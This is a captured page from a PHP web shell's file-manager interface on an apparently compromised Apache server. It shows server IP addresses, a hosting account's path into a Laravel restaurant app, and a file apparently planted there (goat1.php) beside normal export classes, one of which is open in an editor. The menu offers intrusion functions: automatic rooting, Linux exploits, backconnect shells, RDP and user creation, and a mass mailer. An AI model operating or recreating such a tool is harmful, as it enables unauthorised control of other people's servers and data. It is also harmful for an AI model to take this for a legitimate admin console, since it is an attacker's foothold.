Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo9.com /
app /
Exports /
[ HOME SHELL ]
Name
Size
Permission
Action
AdministratorExport.php
1.36
KB
-rwxrwxr-x
ChefExport.php
1.17
KB
-rwxrwxr-x
CreditBalanceReportExport.php
1.26
KB
-rwxrwxr-x
CustomerExport.php
1.26
KB
-rwxrwxr-x
DiningTableExport.php
1.17
KB
-rwxrwxr-x
EmployeeExport.php
1.34
KB
-rwxrwxr-x
ItemCategoryExport.php
1.2
KB
-rwxrwxr-x
ItemExport.php
1.63
KB
-rwxrwxr-x
ItemsReportExport.php
1.47
KB
-rwxrwxr-x
OfferExport.php
1.31
KB
-rwxrwxr-x
OrderExport.php
1.56
KB
-rwxrwxr-x
SalesReportExport.php
1.91
KB
-rwxrwxr-x
TransactionExport.php
1.51
KB
-rwxrwxr-x
WaiterExport.php
1.2
KB
-rwxrwxr-x
goat1.php
143.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : EmployeeExport.php
<?php namespace App\Exports; use App\Enums\Status; use App\Services\EmployeeService; use App\Http\Requests\PaginateRequest; use Maatwebsite\Excel\Concerns\WithHeadings; use Maatwebsite\Excel\Concerns\FromCollection; class EmployeeExport implements FromCollection, WithHeadings { public EmployeeService $employeeService; public PaginateRequest $request; public function __construct(EmployeeService $employeeService, $request) { $this->employeeService = $employeeService; $this->request = $request; } public function collection() : \Illuminate\Support\Collection { $employeeArray = []; $employees = $this->employeeService->list($this->request); foreach ($employees as $employee) { $employeeArray[] = [ $employee->name, $employee->email, $employee->country_code . '' . $employee->phone, $employee->roles[0]->name, trans('statuse.' . $employee->status), ]; } return collect($employeeArray); } public function headings() : array { return [ trans('all.label.name'), trans('all.label.email'), trans('all.label.phone'), trans('all.label.role'), trans('all.label.status') ]; } }
Close